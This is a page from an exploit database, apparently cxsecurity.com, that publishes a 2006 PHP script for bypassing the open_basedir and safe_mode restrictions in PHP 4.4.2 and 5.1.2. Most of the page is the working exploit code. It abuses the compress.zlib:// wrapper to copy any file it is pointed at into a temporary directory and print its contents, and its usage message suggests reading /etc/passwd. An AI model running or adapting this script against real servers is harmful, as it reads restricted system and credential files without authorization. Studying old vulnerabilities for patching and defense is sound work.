PHP 4.4.2 and PHP 5.1.2 open_basedir and safe mode Bypass exploit

2006.04.08
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

<?php /* PHP open_basedir and safe_mode Bypass by Maksymilian Arciemowicz */ $file=""; // File to Include... or use _GET _POST $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp echo "<PRE>\n"; if(empty($file)){ if(empty($_GET['file'])){ if(empty($_POST['file'])){ die("\nSet varibles \$tymczas, \$file or use for varible file POST, GET like ?file=/etc/passwd\n <B><CENTER><FONT COLOR=\"RED\">SecurityReason.Com Exploit</FONT></CENTER></B>"); } else { $file=$_POST['file']; } } else { $file=$_GET['file']; } } $temp=tempnam($tymczas, "cx"); if(copy("compress.zlib://".$file, $temp)){ $zrodlo = fopen($temp, "r"); $tekst = fread($zrodlo, filesize($temp)); fclose($zrodlo); echo "<B>--- Start File ".htmlspecialchars($file)." -------------</B>\n".htmlspecialchars($tekst)."\n<B>--- End File ".htmlspecialchars($file)." ---------------\n"; unlink($temp); die("\n<FONT COLOR=\"RED\"><B>File ".htmlspecialchars($file)." has been already loaded. SecurityReason Team ;]</B></FONT>"); } else { die("<FONT COLOR=\"RED\"><CENTER>Sorry... File <B>".htmlspecialchars($file)."</B> dosen't exists or you don't have access.</CENTER></FONT>"); } ?>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top